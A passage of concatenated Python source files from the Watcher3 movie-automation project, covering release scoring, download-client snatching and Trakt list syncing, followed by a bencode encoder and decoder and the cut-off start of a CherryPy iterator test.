class ImdbRssSync(object):
''' Scheduled task to automatically sync IMDB watchlists '''
@staticmethod
def create():
interval = core.CONFIG['Search']['Watchlists']['imdbfrequency'] * 60
now = datetime.datetime.today()
hr = now.hour
min = now.minute + core.CONFIG['Search']['Watchlists']['imdbfrequency']
if core.CONFIG['Search']['Watchlists']['imdbsync']:
auto_start = True
else:
auto_start = False
SchedulerPlugin.ScheduledTask(hr, min, interval, imdb.sync, auto_start=auto_start, name='IMDB Sync')
return
class PopularMoviesSync(object):
''' Scheduled task to automatically sync PopularMovies list '''
@staticmethod
def create():
interval = 24 * 3600
hr = core.CONFIG['Search']['Watchlists']['popularmovieshour']
min = core.CONFIG['Search']['Watchlists']['popularmoviesmin']
if core.CONFIG['Search']['Watchlists']['popularmoviessync']:
auto_start = True
else:
auto_start = False
SchedulerPlugin.ScheduledTask(hr, min, interval, popularmovies.sync_feed, auto_start=auto_start, name='PopularMovies Sync')
return
class TraktSync(object):
''' Scheduled task to automatically sync selected Trakt lists '''
@staticmethod
def create():
interval = core.CONFIG['Search']['Watchlists']['traktfrequency'] * 60
now = datetime.datetime.today()
hr = now.hour
min = now.minute + core.CONFIG['Search']['Watchlists']['traktfrequency']
if core.CONFIG['Search']['Watchlists']['traktsync']:
if any(core.CONFIG['Search']['Watchlists']['Traktlists'].keys()):
auto_start = True
else:
logging.warning('Trakt sync enabled but no lists are enabled.')
auto_start = False
else:
auto_start = False
SchedulerPlugin.ScheduledTask(hr, min, interval, trakt.sync, auto_start=auto_start, name='Trakt Sync')
return
class FileScan(object):
''' Scheduled task to automatically sync selected Trakt lists '''
@staticmethod
def create():
interval = 24 * 3600
hr = core.CONFIG['System']['FileManagement']['scanmissinghour']
min = core.CONFIG['System']['FileManagement']['scanmissingmin']
auto_start = core.CONFIG['System']['FileManagement']['scanmissingfiles']
SchedulerPlugin.ScheduledTask(hr, min, interval, Manage.scanmissingfiles, auto_start=auto_start, name='Missing Files Scan')
return
```
#### File: Watcher3/core/searchresults.py
```python
import logging
import datetime
from base64 import b16encode
import core
from core.helpers import Url
import json
logging = logging.getLogger(__name__)
def score(releases, imdbid=None, imported=False):
''' Scores and filters scene releases
releases (list): dicts of release metadata to score
imdbid (str): imdb identification number <optional -default None>
impored (bool): indicate if search result is faked import <optional -default False>
If imported is True imdbid can be ignored. Otherwise imdbid is required.
If imported, uses modified 'base' quality profile so releases
cannot be filtered out.
Iterates over the list and filters movies based on Words.
Scores movie based on reslution priority, title match, and
preferred words,
Word groups are split in to a list of lists:
[['word'], ['word2', 'word3'], 'word4']
Adds 'score' key to each dict in releases and applies score.
Returns list of result dicts
'''
if len(releases) == 0:
logging.info('No releases to score.')
return releases
logging.info('Scoring {} releases.'.format(len(releases)))
if imdbid is None and imported is False:
logging.warning('Imdbid required if result is not library import.')
return releases
year = None
if imported:
logging.debug('Releases are of origin "Import", using custom default quality profile.')
titles = []
check_size = False
movie_details = {'year': '\n'}
filters = {'requiredwords': '', 'preferredwords': '', 'ignoredwords': ''}
quality = import_quality()
else:
movie_details = core.sql.get_movie_details('imdbid', imdbid)
quality_profile = movie_details['quality']
logging.debug('Scoring based on quality profile {}'.format(quality_profile))
check_size = True
year = movie_details.get('year')
if quality_profile in core.CONFIG['Quality']['Profiles']:
quality = core.CONFIG['Quality']['Profiles'][quality_profile]
else:
quality = core.CONFIG['Quality']['Profiles'][core.config.default_profile()]
filters = json.loads(movie_details['filters'])
sources = quality['Sources']
required_groups = [i.split('&') for i in (quality['requiredwords'] + ',' + filters['requiredwords']).lower().replace(' ', '').split(',') if i != '']
preferred_groups = [i.split('&') for i in (quality['preferredwords'] + ',' + filters['preferredwords']).lower().replace(' ', '').split(',') if i != '']
ignored_groups = [i.split('&') for i in (quality['ignoredwords'] + ',' + filters['ignoredwords']).lower().replace(' ', '').split(',') if i != '']
# Begin scoring and filtering
reset(releases)
if ignored_groups and ignored_groups != ['']:
releases = remove_ignored(releases, ignored_groups)
if required_groups and required_groups != ['']:
releases = keep_required(releases, required_groups)
if core.CONFIG['Search']['retention'] > 0 and any(i['type'] == 'nzb' for i in releases):
releases = retention_check(releases)
if any(i['type'] in ('torrent', 'magnet') for i in releases):
if core.CONFIG['Search']['mintorrentseeds'] > 0:
releases = seed_check(releases)
if core.CONFIG['Search']['freeleechpoints'] > 0:
releases = freeleech(releases)
releases = score_sources(releases, sources, check_size=check_size)
if quality['scoretitle']:
titles = [movie_details.get('title')]
if movie_details.get('alternative_titles'):
titles += movie_details['alternative_titles'].split(',')
releases = fuzzy_title(releases, titles, year=year)
if preferred_groups and preferred_groups != ['']:
releases = score_preferred(releases, preferred_groups)
logging.info('Finished scoring releases.')
return releases
def reset(releases):
''' Sets all result's scores to 0
releases (dict): scene release metadata to score
returns dict
'''
logging.debug('Resetting release scores to 0.')
for i, d in enumerate(releases):
releases[i]['score'] = 0
def remove_ignored(releases, group_list):
''' Remove releases with ignored groups of 'words'
releases (list[dict]): scene release metadata to score and filter
group_list (list[list[str]]): forbidden groups of words
group_list must be formatted as a list of lists ie:
[['word1'], ['word2', 'word3']]
Iterates through releases and removes every entry that contains any
group of words in group_list
Returns list[dict]
'''
keep = []
logging.info('Filtering Ignored Words.')
for r in releases:
if r['type'] == 'import' and r not in keep:
keep.append(r)
continue
cond = False
for word_group in group_list:
if all(word in r['title'].lower() for word in word_group):
logging.debug('{} found in {}, removing from releases.'.format(word_group, r['title']))
cond = True
break
if cond is False and r not in keep:
keep.append(r)
logging.info('Keeping {} releases.'.format(len(keep)))
return keep
def keep_required(releases, group_list):
''' Remove releases without required groups of 'words'
releases (list[dict]): scene release metadata to score and filter
group_list (list[list[str]]): required groups of words
group_list must be formatted as a list of lists ie:
[['word1'], ['word2', 'word3']]
Iterates through releases and removes every entry that does not
contain any group of words in group_list
Returns list[dict]
'''
keep = []
logging.info('Filtering Required Words.')
logging.debug('Required Words: {}'.format(str(group_list)))
for r in releases:
if r['type'] == 'import' and r not in keep:
keep.append(r)
continue
for word_group in group_list:
if all(word in r['title'].lower() for word in word_group) and r not in keep:
logging.debug('{} found in {}, keeping this search result.'.format(word_group, r['title']))
keep.append(r)
break
else:
continue
logging.info('Keeping {} releases.'.format(len(keep)))
return keep
def retention_check(releases):
''' Remove releases older than 'retention' days
releases (list[dict]): scene release metadata to score and filter
retention (int): days of retention limit
Iterates through releases and removes any nzb entry that was
published more than 'retention' days ago
returns list[dict]
'''
today = datetime.datetime.today()
logging.info('Checking retention [threshold = {} days].'.format(core.CONFIG['Search']['retention']))
keep = []
for result in releases:
if result['type'] == 'nzb':
pubdate = datetime.datetime.strptime(result['pubdate'], '%d %b %Y')
age = (today - pubdate).days
if age < core.CONFIG['Search']['retention']:
keep.append(result)
else:
logging.debug('{} published {} days ago, removing search result.'.format(result['title'], age))
else:
keep.append(result)
logging.info('Keeping {} releases.'.format(len(keep)))
return keep
def seed_check(releases):
''' Remove any torrents with fewer than 'seeds' seeders
releases (list[dict]): scene release metadata to score and filter
Gets required seeds from core.CONFIG
Returns list[dict]
'''
logging.info('Checking torrent seeds.')
keep = []
for result in releases:
if result['type'] in ('torrent', 'magnet'):
if int(result['seeders']) >= core.CONFIG['Search']['mintorrentseeds']:
keep.append(result)
else:
logging.debug('{} has {} seeds, removing search result.'.format(result['title'], result['seeders']))
else:
keep.append(result)
logging.info('Keeping {} releases.'.format(len(keep)))
return keep
def freeleech(releases):
''' Adds points to freeleech torrents
releases (list[dict]): scene release metadata to score and filter
Returns list[dict]
'''
points = core.CONFIG['Search']['freeleechpoints']
logging.info('Adding Freeleech points.')
for res in releases:
if res['type'] in ('magnet', 'torrent') and res['freeleech'] == 1:
logging.debug('Adding {} Freeleech points to {}.'.format(points, res['title']))
res['score'] += points
return releases
def score_preferred(releases, group_list):
''' Increase score for each group of 'words' match
releases (list[dict]): scene release metadata to score and filter
group_list (list): preferred groups of words
group_list must be formatted as a list of lists ie:
[['word1'], ['word2', 'word3']]
Iterates through releases and adds 10 points to every
entry for each word group it contains
Returns list[dict]
'''
logging.info('Scoring Preferred Words.')
if not group_list or group_list == ['']:
return
for r in releases:
for word_group in group_list:
if all(word in r['title'].lower() for word in word_group):
logging.debug('{} found in {}, adding 10 points.'.format(word_group, r['title']))
r['score'] += 10
else:
continue
return releases
def fuzzy_title(releases, titles, year='\n'):
''' Score and remove releases based on title match
releases (list[dict]): scene release metadata to score and filter
titles (list): titles to match against
year (str): year of movie release <optional -default '\n'>
If titles is an empty list every result is treated as a perfect match
Matches releases based on release_title.split(year)[0]. If year is not passed,
matches on '\n', which will include the entire string.
Iterates through releases and removes any entry that does not
fuzzy match 'title' > 70.
Adds fuzzy_score / 20 points to ['score']
Returns list[dict]
'''
logging.info('Checking title match.')
keep = []
if titles == [] or titles == [None]:
logging.debug('No titles available to compare, scoring all as perfect match.')
for result in releases:
result['score'] += 20
keep.append(result)
else:
for result in releases:
if result['type'] == 'import' and result not in keep:
logging.debug('{} is an Import, soring as a perfect match.'.format(result['title']))
result['score'] += 20
keep.append(result)
continue
rel_title_ss = result['title'].split(year)[0]
logging.debug('Comparing release substring {} with titles {}.'.format(rel_title_ss, titles))
matches = [_fuzzy_title(rel_title_ss, title) for title in titles]
if any(match > 70 for match in matches):
result['score'] += int(max(matches) / 5)
keep.append(result)
else:
logging.debug('{} best title match was {}%, removing search result.'.format(result['title'], max(matches)))
logging.info('Keeping {} releases.'.format(len(keep)))
return keep
def _fuzzy_title(a, b):
''' Determines how much of a is in b
a (str): String to match against b
b (str): String to match a against
Order of a and b matters.
A is broken down and words are compared against B's words.
ie:
_fuzzy_title('This is string a', 'This is string b and has extra words.')
Returns 75 since 75% of a is in b.
Returns int
'''
a = a.replace('&', 'and')
b = b.replace('&', 'and')
a_words = Url.normalize(a).split(' ')
b_words = Url.normalize(b).split(' ')
m = 0
a_len = len(a_words)
for i in a_words:
if i in b_words:
b_words.remove(i)
m += 1
return int((m / a_len) * 100)
def score_sources(releases, sources, check_size=True):
''' Score releases based on quality/source preferences
releases (list[dict]): scene release metadata to score and filter
sources (dict): sources from user config
check_size (bool): whether or not to filter based on size
Iterates through releases and removes any entry that does not
fit into quality criteria (source-resoution, filesize)
Adds to ['score'] based on priority of match
Returns list[dict]
'''
logging.info('Filtering resolution and size requirements.')
score_range = len(core.SOURCES) + 1
sizes = core.CONFIG['Quality']['Sources']
keep = []
for result in releases:
result_res = result['resolution']
logging.debug('Scoring and filtering {} based on resolution {}.'.format(result['title'], result_res))
size = result['size'] / 1000000
if result['type'] == 'import' and result['resolution'] not in sources:
keep.append(result)
continue
for k, v in sources.items():
if v[0] is False and result['type'] != 'import':
continue
priority = v[1]
if check_size:
min_size = sizes[k]['min']
max_size = sizes[k]['max']
else:
min_size = 0
max_size = Ellipsis
if result_res == k:
logging.debug('{} matches source {}, checking size.'.format(result['title'], k))
if result['type'] != 'import' and not (min_size < size < max_size):
logging.debug('Removing {}, size {} not in range {}-{}.'.format(result['title'], size, min_size, max_size))
break
result['score'] += abs(priority - score_range) * 40
keep.append(result)
else:
continue
logging.info('Keeping {} releases.'.format(len(keep)))
return keep
def import_quality():
''' Creates quality profile for imported releases
Creates import profile that mimics the base profile, but it incapable
of removing releases.
Returns dict
'''
profile = core.config.base_profile
profile['ignoredwords'] = ''
profile['requiredwords'] = ''
for i in profile['Sources']:
profile['Sources'][i][0] = True
return profile
def generate_simulacrum(movie):
''' Generates phony search result for imported movies
movie (dict): movie info
movie will use 'release_title' key if found, else 'title' to generate fake release
Resturns dict to match SEARCHRESULTS table
'''
logging.info('Creating "fake" search result for imported movie {}'.format(movie['title']))
result = {'status': 'Finished',
'info_link': '#',
'pubdate': None,
'title': None,
'imdbid': movie['imdbid'],
'torrentfile': None,
'indexer': 'Library Import',
'date_found': str(datetime.date.today()),
'score': None,
'type': 'import',
'downloadid': None,
'guid': None,
'resolution': movie.get('resolution'),
'size': movie.get('size') or 0,
'releasegroup': movie.get('releasegroup') or '',
'freeleech': 0
}
title = '{}.{}.{}.{}.{}.{}'.format(movie['title'],
movie['year'],
movie.get('resolution') or '.', # Kind of a hacky way to make sure it doesn't print None in the title
movie.get('audiocodec') or '.',
movie.get('videocodec') or '.',
movie.get('releasegroup') or '.'
)
while len(title) > 0 and title[-1] == '.':
title = title[:-1]
while '..' in title:
title = title.replace('..', '.')
result['title'] = title
result['guid'] = movie.get('guid') or 'import{}'.format(b16encode(title.encode('ascii', errors='ignore')).decode('utf-8').zfill(16)[:16]).lower()
return result
```
#### File: Watcher3/core/snatcher.py
```python
import logging
import datetime
import urllib.parse
import core
from core import plugins
from core import downloaders
from core.helpers import Torrent
from core.library import Manage
logging = logging.getLogger(__name__)
'''
Handles snatching search results. This includes choosing the best result,
retreiving the link, and sending it to the download client.
Clarification notes:
When snatching a torrent, the download id should *always* be the torrent hash.
When snatching NZBs use the client-supplied download id if possible. If the client
does not return a download id use None.
'''
def grab_all():
''' Grabs best result for all movies in library
Automatically determines which movies can be grabbed or re-grabbed and
executes get_best_release() to find best result then sends release
dict to download()
Returns bool (False is no movies to grab, True if any movies were attempted)
'''
logging.info('Running automatic snatcher for all movies.')
today = datetime.datetime.today()
keepsearching = core.CONFIG['Search']['keepsearching']
keepsearchingscore = core.CONFIG['Search']['keepsearchingscore']
keepsearchingdays = core.CONFIG['Search']['keepsearchingdays']
keepsearchingdelta = datetime.timedelta(days=keepsearchingdays)
movies = core.sql.get_user_movies()
if not movies:
return False
for movie in movies:
status = movie['status']
if status == 'Disabled':
logging.debug('{} is Disabled, skipping.'.format(movie['title']))
continue
title = movie['title']
year = movie['year']
if status == 'Found':
logging.info('{} status is Found. Running automatic snatcher.'.format(title))
best_release = get_best_release(movie)
if best_release:
download(best_release)
continue
if status == 'Finished' and keepsearching is True:
finished_date = movie['finished_date']
if not finished_date:
continue
finished_date_obj = datetime.datetime.strptime(finished_date, '%Y-%m-%d')
if finished_date_obj + keepsearchingdelta >= today:
minscore = (movie.get('finished_score') or 0) + keepsearchingscore
logging.info('{} {} was marked Finished on {}. Checking for a better release (min score {}).'.format(title, year, finished_date, minscore))
best = get_best_release(movie, minscore=minscore)
if best:
download(best)
continue
else:
continue
else:
continue
logging.info('######### Automatic search/snatch complete #########')
def get_best_release(movie, minscore=0):
''' Grabs the best scoring result that isn't 'Bad'
movie (dict): movie info from local db
minscore (int): minimum acceptable score for best release <optional - default 0>
Picks the best release that is available and above minscore threshold
Returns dict of search result from local database
'''
logging.info('Selecting best release for {}'.format(movie['title']))
try:
imdbid = movie['imdbid']
quality = movie['quality']
year = movie['year']
title = movie['title']
release_date = movie['release_date']
except Exception as e: # noqa
logging.error('Invalid movie data.', exc_info=True)
return {}
search_results = core.sql.get_search_results(imdbid, quality)
if not search_results:
logging.warning('Unable to automatically grab {}, no results.'.format(imdbid))
return {}
# Filter out any results we don't want to grab
search_results = [i for i in search_results if i['type'] != 'import']
if not core.CONFIG['Downloader']['Sources']['usenetenabled']:
search_results = [i for i in search_results if i['type'] != 'nzb']
if not core.CONFIG['Downloader']['Sources']['torrentenabled']:
search_results = [i for i in search_results if i['type'] not in ('torrent', 'magnet')]
if not search_results:
logging.warning('Unable to automatically grab {}, no results available for enabled download client.'.format(imdbid))
return {}
# Check if we are past the 'waitdays'
today = datetime.datetime.today()
release_weeks_old = (today - datetime.datetime.strptime(release_date, '%Y-%m-%d')).days / 7
wait_days = core.CONFIG['Search']['waitdays']
earliest_found = min([x['date_found'] for x in search_results])
date_found = datetime.datetime.strptime(earliest_found, '%Y-%m-%d')
if (today - date_found).days < wait_days:
if core.CONFIG['Search']['skipwait'] and release_weeks_old > core.CONFIG['Search']['skipwaitweeks']:
logging.info('{} released {} weeks ago, skipping wait and grabbing immediately.'.format(title, release_weeks_old))
else:
logging.info('Earliest found result for {} is {}, waiting {} days to grab best result.'.format(imdbid, date_found, wait_days))
return {}
# Since seach_results comes back in order of score we can go through in
# order until we find the first Available result and grab it.
for result in search_results:
result = dict(result) # TODO why?
status = result['status']
result['year'] = year
if status == 'Available' and result['score'] > minscore:
logging.info('{} is best available result for {}'.format(result['title'], title))
return result
# if doing a re-search, if top ranked result is Snatched we have nothing to do.
elif status in ('Snatched', 'Finished'):
logging.info('Top-scoring release for {} has already been snatched.'.format(imdbid))
return {}
else:
continue
logging.warning('No Available results for {}.'.format(imdbid))
return None
def download(data):
''' Sends release to download client
data (dict): search result from local database
Sends data to helper method snatch_nzb or snatch_torrent based on download type
Executes snatched plugins if successful
Returns dict from helper method snatch_nzb or snatch_torrent
'''
logging.info('Sending {} to download client.'.format(data['title']))
if data['type'] == 'import':
return {'response': False, 'error': 'Cannot download imports.'}
imdbid = data['imdbid']
resolution = data['resolution']
kind = data['type']
info_link = urllib.parse.quote(data['info_link'], safe='')
indexer = data['indexer']
title = data['title']
year = data['year']
if data['type'] == 'nzb':
if core.CONFIG['Downloader']['Sources']['usenetenabled']:
response = snatch_nzb(data)
else:
return {'response': False, 'message': 'NZB submitted but nzb snatching is disabled.'}
if data['type'] in ('torrent', 'magnet'):
if core.CONFIG['Downloader']['Sources']['torrentenabled']:
response = snatch_torrent(data)
else:
return {'response': False, 'message': 'Torrent submitted but torrent snatching is disabled.'}
if response['response'] is True:
download_client = response['download_client']
downloadid = response['downloadid']
plugins.snatched(title, year, imdbid, resolution, kind, download_client, downloadid, indexer, info_link)
return response
else:
return response
def snatch_nzb(data):
''' Sends nzb to download client
data (dict): search result from local database
Returns dict {'response': True, 'message': 'lorem impsum'}
'''
guid = data['guid']
imdbid = data['imdbid']
title = data['title']
for client, config in core.CONFIG['Downloader']['Usenet'].items():
if config['enabled']:
logging.info('Sending nzb to {}'.format(client))
response = getattr(downloaders, client).add_nzb(data)
if response['response']:
logging.info('Successfully sent {} to {}.'.format(title, client))
db_update = {'downloadid': response['downloadid'], 'download_client': client}
core.sql.update_multiple_values('SEARCHRESULTS', db_update, 'guid', guid)
if update_status_snatched(guid, imdbid):
return {'response': True, 'message': 'Sent to {}.'.format(client), 'download_client': client, 'downloadid': response['downloadid']}
else:
return {'response': False, 'error': 'Could not mark search result as Snatched.'}
else:
return response
def snatch_torrent(data):
''' Sends torrent or magnet to download client
data (dict): search result from local database
Returns dict {'response': True, 'message': 'lorem impsum'}
'''
guid = data['guid']
imdbid = data['imdbid']
title = data['title']
kind = data['type']
if urllib.parse.urlparse(guid).netloc:
# if guid is not a url and not hash we'll have to get the hash now
guid_ = Torrent.get_hash(data['torrentfile'])
if guid_:
core.sql.update('SEARCHRESULTS', 'guid', guid_, 'guid', guid)
guid = guid_
else:
return {'response': False, 'error': 'Unable to get torrent hash from indexer.'}
for client, config in core.CONFIG['Downloader']['Torrent'].items():
if config['enabled']:
logging.info('Sending {} to {}'.format(kind, client))
response = getattr(downloaders, client).add_torrent(data)
if response['response']:
logging.info('Successfully sent {} to {}.'.format(title, client))
db_update = {'downloadid': response['downloadid'], 'download_client': client}
core.sql.update_multiple_values('SEARCHRESULTS', db_update, 'guid', guid)
if update_status_snatched(guid, imdbid):
return {'response': True, 'message': 'Sent to {}.'.format(client), 'download_client': client, 'downloadid': response['downloadid']}
else:
return {'response': False, 'error': 'Could not mark search result as Snatched.'}
else:
return response
else:
return {'response': False, 'error': 'No download client enabled.'}
def update_status_snatched(guid, imdbid):
''' Sets status to Snatched
guid (str): guid for download link
imdbid (str): imdb id #
Updates MOVIES, SEARCHRESULTS, and MARKEDRESULTS to 'Snatched'
Returns bool
'''
logging.info('Updating {} to Snatched.'.format(imdbid))
if not Manage.searchresults(guid, 'Snatched'):
logging.error('Unable to update search result status to Snatched.')
return False
if not Manage.markedresults(guid, 'Snatched', imdbid=imdbid):
logging.error('Unable to store marked search result as Snatched.')
return False
if not Manage.movie_status(imdbid):
logging.error('Unable to update movie status to Snatched.')
return False
return True
```
#### File: Watcher3/core/trakt.py
```python
from core.helpers import Url
from core.helpers import Comparisons
from core.library import Manage
import json
import core
import datetime
from core import searcher
import xml.etree.cElementTree as ET
import re
import logging
logging = logging.getLogger(__name__)
searcher = searcher
date_format = '%a, %d %b %Y %H:%M:%S'
trakt_date_format = '%Y-%m-%dT%H:%M:%S'
def sync():
''' Syncs all enabled Trakt lists and rss lists
Gets list of movies from each enabled Trakt lists
Adds missing movies to library as Waiting/Default
Returns bool for success/failure
'''
logging.info('Syncing Trakt lists.')
success = True
min_score = core.CONFIG['Search']['Watchlists']['traktscore']
length = core.CONFIG['Search']['Watchlists']['traktlength']
movies = []
if core.CONFIG['Search']['Watchlists']['traktrss']:
sync_rss()
for k, v in core.CONFIG['Search']['Watchlists']['Traktlists'].items():
if v is False:
continue
movies += [i for i in get_list(k, min_score=min_score, length=length) if i not in movies]
library = [i['imdbid'] for i in core.sql.get_user_movies()]
movies = [i for i in movies if i['ids']['imdb'] not in library]
logging.info('Found {} new movies from Trakt lists.'.format(len(movies)))
for i in movies:
imdbid = i['ids']['imdb']
logging.info('Adding movie {} {} from Trakt'.format(i['title'], imdbid))
added = Manage.add_movie({'id': i['ids']['tmdb'],
'imdbid': i['ids']['imdb'],
'title': i['title'],
'origin': 'Trakt'})
if added['response'] and core.CONFIG['Search']['searchafteradd'] and i['year'] != 'N/A':
searcher.search(imdbid, i['title'], i['year'], core.config.default_profile())
return success
def sync_rss():
''' Gets list of new movies in user's rss feed(s)
Returns list of movie dicts
'''
try:
record = json.loads(core.sql.system('trakt_sync_record'))
except Exception as e:
record = {}
for url in core.CONFIG['Search']['Watchlists']['traktrss'].split(','):
list_id = url.split('.atom')[0].split('/')[-1]
last_sync = record.get(list_id) or 'Sat, 01 Jan 2000 00:00:00'
last_sync = datetime.datetime.strptime(last_sync, date_format)
logging.info('Syncing Trakt RSS watchlist {}. Last sync: {}'.format(list_id, last_sync))
try:
feed = Url.open(url).text
feed = re.sub(r'xmlns=".*?"', r'', feed)
root = ET.fromstring(feed)
except Exception as e:
logging.error('Trakt rss request.', exc_info=True)
continue
d = root.find('updated').text[:19]
do = datetime.datetime.strptime(d, trakt_date_format)
record[list_id] = datetime.datetime.strftime(do, date_format)
for entry in root.iter('entry'):
try:
pub = datetime.datetime.strptime(entry.find('published').text[:19], trakt_date_format)
if last_sync >= pub:
break
else:
t = entry.find('title').text
title = ' ('.join(t.split(' (')[:-1])
year = ''
for i in t.split(' (')[-1]:
if i.isdigit():
year += i
year = int(year)
logging.info('Searching TheMovieDatabase for {} {}'.format(title, year))
movie = Manage.tmdb._search_title('{} {}'.format(title, year))[0]
if movie:
movie['origin'] = 'Trakt'
logging.info('Found new watchlist movie {} {}'.format(title, year))
r = Manage.add_movie(movie)
if r['response'] and core.CONFIG['Search']['searchafteradd'] and movie['year'] != 'N/A':
searcher.search(movie['imdbid'], movie['title'], movie['year'], core.config.default_profile())
else:
logging.warning('Unable to find {} {} on TheMovieDatabase'.format(title, year))
except Exception as e:
logging.error('Unable to parse Trakt RSS list entry.', exc_info=True)
logging.info('Storing last synced date.')
if core.sql.row_exists('SYSTEM', name='trakt_sync_record'):
core.sql.update('SYSTEM', 'data', json.dumps(record), 'name', 'trakt_sync_record')
else:
core.sql.write('SYSTEM', {'data': json.dumps(record), 'name': 'trakt_sync_record'})
logging.info('Trakt RSS sync complete.')
def get_list(list_name, min_score=0, length=10):
''' Gets list of trending movies from Trakt
list_name (str): name of Trakt list. Must be one of ('trending', 'popular', 'watched', 'collected', 'anticipated', 'boxoffice')
min_score (float): minimum score to accept (max 10) <optional - default 0>
length (int): how many results to get from Trakt <optional - default 10>
Length is applied before min_score, so actual result count
can be less than length
Returns list of dicts of movie info
'''
logging.info('Getting Trakt list {}'.format(list_name))
headers = {'Content-Type': 'application/json',
'trakt-api-version': '2',
'trakt-api-key': Comparisons._k(b'trakt')
}
if list_name not in ('trending', 'popular', 'watched', 'collected', 'anticipated', 'boxoffice'):
logging.error('Invalid list_name {}'.format(list_name))
return []
url = 'https://api.trakt.tv/movies/{}/?extended=full'.format(list_name)
try:
r = Url.open(url, headers=headers)
if r.status_code != 200:
return []
m = json.loads(r.text)[:length]
if list_name == 'popular':
return [i for i in m if i['rating'] >= min_score]
return [i['movie'] for i in m if i['movie']['rating'] >= min_score]
except Exception as e:
logging.error('Unable to get Trakt list.', exc_info=True)
return []
```
#### File: lib/bencodepy/decoder.py
```python
from collections import OrderedDict
from collections.abc import Iterable
import bencodepy
class Decoder:
def __init__(self, data: bytes):
self.data = data
self.idx = 0
def __read(self, i: int) -> bytes:
"""Returns a set number (i) of bytes from self.data."""
b = self.data[self.idx: self.idx + i]
self.idx += i
if len(b) != i:
raise bencodepy.DecodingError(
"Incorrect byte length returned between indexes of {0} and {1}. Possible unexpected End of File."
.format(str(self.idx), str(self.idx - i)))
return b
def __read_to(self, terminator: bytes) -> bytes:
"""Returns bytes from self.data starting at index (self.idx) until terminator character."""
try:
# noinspection PyTypeChecker
i = self.data.index(terminator, self.idx)
b = self.data[self.idx:i]
self.idx = i + 1
return b
except ValueError:
raise bencodepy.DecodingError(
'Unable to locate terminator character "{0}" after index {1}.'.format(str(terminator), str(self.idx)))
def __parse(self) -> object:
"""Selects the appropriate method to decode next bencode element and returns the result."""
char = self.data[self.idx: self.idx + 1]
if char in [b'1', b'2', b'3', b'4', b'5', b'6', b'7', b'8', b'9', b'0']:
str_len = int(self.__read_to(b':'))
return self.__read(str_len)
elif char == b'i':
self.idx += 1
return int(self.__read_to(b'e'))
elif char == b'd':
return self.__parse_dict()
elif char == b'l':
return self.__parse_list()
elif char == b'':
raise bencodepy.DecodingError('Unexpected End of File at index position of {0}.'.format(str(self.idx)))
else:
raise bencodepy.DecodingError(
'Invalid token character ({0}) at position {1}.'.format(str(char), str(self.idx)))
def decode(self) -> Iterable:
"""Start of decode process. Returns final results."""
if self.data[0:1] not in (b'd', b'l'):
return self.__wrap_with_tuple()
return self.__parse()
def __wrap_with_tuple(self) -> tuple:
"""Returns a tuple of all nested bencode elements."""
l = list()
length = len(self.data)
while self.idx < length:
l.append(self.__parse())
return tuple(l)
def __parse_dict(self) -> OrderedDict:
"""Returns an Ordered Dictionary of nested bencode elements."""
self.idx += 1
d = OrderedDict()
key_name = None
while self.data[self.idx: self.idx + 1] != b'e':
if key_name is None:
key_name = self.__parse()
else:
d[key_name] = self.__parse()
key_name = None
self.idx += 1
return d
def __parse_list(self) -> list:
"""Returns an list of nested bencode elements."""
self.idx += 1
l = []
while self.data[self.idx: self.idx + 1] != b'e':
l.append(self.__parse())
self.idx += 1
return l
def decode_from_file(path: str) -> Iterable:
"""Convenience function. Reads file and calls decode()."""
with open(path, 'rb') as f:
b = f.read()
return decode(b)
def decode(data: bytes) -> Iterable:
"""Convenience function. Initializes Decoder class, calls decode method, and returns the result."""
decoder = Decoder(data)
return decoder.decode()
```
#### File: lib/bencodepy/encode.py
```python
from . import EncodingError
from collections import OrderedDict
def encode(obj, encoding='utf-8', strict=True):
coded_byte_list = []
def __encode_str(s: str) -> None:
"""Converts the input string to bytes and passes it the __encode_byte_str function for encoding."""
b = bytes(s, encoding)
__encode_byte_str(b)
def __encode_byte_str(b: bytes) -> None:
"""Ben-encodes string from bytes."""
nonlocal coded_byte_list
length = len(b)
coded_byte_list.append(bytes(str(length), encoding) + b':' + b)
def __encode_int(i: int) -> None:
"""Ben-encodes integer from int."""
nonlocal coded_byte_list
coded_byte_list.append(b'i' + bytes(str(i), 'utf-8') + b'e')
def __encode_tuple(t: tuple) -> None:
"""Converts the input tuple to lists and passes it the __encode_list function for encoding."""
l = [i for i in t]
__encode_list(l)
def __encode_list(l: list) -> None:
"""Ben-encodes list from list."""
nonlocal coded_byte_list
coded_byte_list.append(b'l')
for i in l:
__select_encoder(i)
coded_byte_list.append(b'e')
def __encode_dict(d: dict) -> None:
"""Ben-encodes dictionary from dict."""
nonlocal coded_byte_list
coded_byte_list.append(b'd')
for k in d:
__select_encoder(k)
__select_encoder(d[k])
coded_byte_list.append(b'e')
opt = {
bytes: lambda x: __encode_byte_str(x),
OrderedDict: lambda x: __encode_dict(x),
dict: lambda x: __encode_dict(x),
list: lambda x: __encode_list(x),
str: lambda x: __encode_str(x),
int: lambda x: __encode_int(x),
tuple: lambda x: __encode_tuple(x),
}
def __select_encoder(o: object) -> bytes:
"""Calls the appropriate function to encode the passed object (obj)."""
nonlocal opt
t = type(o)
if t in opt:
opt[t](o)
else:
if isinstance(o, bytes):
__encode_byte_str(o)
elif isinstance(o, dict):
__encode_dict(o)
elif isinstance(o, list):
__encode_list(o)
elif isinstance(o, str):
__encode_str(o)
elif isinstance(o, int):
__encode_int(o)
elif isinstance(o, tuple):
__encode_tuple(o)
else:
if strict:
nonlocal coded_byte_list
coded_byte_list = []
raise EncodingError("Unable to encode object: {0}".format(o.__repr__()))
else:
print("Unable to encode object: {0}".format(str(o)))
__select_encoder(obj)
return b''.join(coded_byte_list)
```
#### File: cherrypy/test/test_iterator.py
```python
import six
import cherrypy
from cherrypy.test import helper
class IteratorBase(object):
created = 0
datachunk = 'butternut squash' * 256
@classmethod
def incr(cls):
cls.created += 1
@classmethod
def decr(cls):
cls.created -= 1
class OurGenerator(IteratorBase):
def __iter__(self):
self.incr()
try:
for i in range(1024):
yield self.datachunk
finally:
self.decr()
class OurIterator(IteratorBase):
started = False
closed_off = False
count = 0
def increment(self):
self.incr()
def decrement(self):
if not self.closed_off:
self.closed_off = True
self.decr()
def __iter__(self):
return self
def __next__(self):
if not self.started:
self.started = True
self.increment()
self.count += 1
if self.count > 1024:
raise StopIteration
return self.datachunk
next = __next__
def __del__(self):
self.decrement()
class OurClosableIterator(OurIterator):
def close(self):
self.decrement()
class OurNotClosableIterator(OurIterator):
# We can't close something which requires an additional argument.
def close(self, somearg):
self.decrement()
class OurUnclosableIterator(OurIterator):
close = 'close' # not callable!
class IteratorTest(helper.CPWebCase):
@staticmethod
